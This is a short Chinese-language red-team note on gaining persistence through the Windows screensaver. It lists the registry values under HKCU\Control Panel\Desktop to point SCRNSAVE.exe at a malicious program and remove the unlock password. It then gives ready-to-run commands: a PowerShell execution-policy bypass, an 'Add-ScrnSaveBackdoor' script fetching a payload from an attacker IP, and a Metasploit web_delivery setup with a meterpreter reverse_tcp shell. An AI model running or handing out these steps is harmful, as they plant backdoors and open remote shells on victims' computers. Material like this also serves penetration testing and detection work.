windows屏幕保护程序

攻击者可以通过执行由用户不活动触发的恶意内容来建立持久性。
屏幕保护程序是在用户不活动时间的可配置时间后执行的程序，
由文件扩展名为 .scr 的可移植可执行 （PE） 文件组成。
Windows屏幕保护程序应用程序scrnsave.scr位于64位Windows系统中，以及基本Windows安装中包含的屏幕保护程序。
C:\Windows\System32\
C:\Windows\sysWOW64\
以下屏幕保护程序设置存储在注册表 （） 中，可以对其进行操作以实现持久性：
HKCU\Control Panel\Desktop\
SCRNSAVE.exe- 设置为恶意 PE 路径
ScreenSaveActive- 设置为“1”以启用屏幕保护程序
ScreenSaverIsSecure- 设置为“0”不需要密码即可解锁
ScreenSaveTimeout- 在执行屏幕保护程序之前设置用户不活动超时
攻击者可以使用屏幕保护程序设置来保持持久性，
方法是将屏幕保护程序设置为在用户处于非活动状态的特定时间范围后运行恶意软件。

set-executionpolicy Bypass
Import-Module .\Add-ScrnSaveBackdoor.ps1
Add-ScrnSaveBackdoor -PayloadURL http://192.168.85.161:8080/U4yNTne

use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
set target 2
set LHOST 192.168.85.161
set LPORT 7856
exploit -j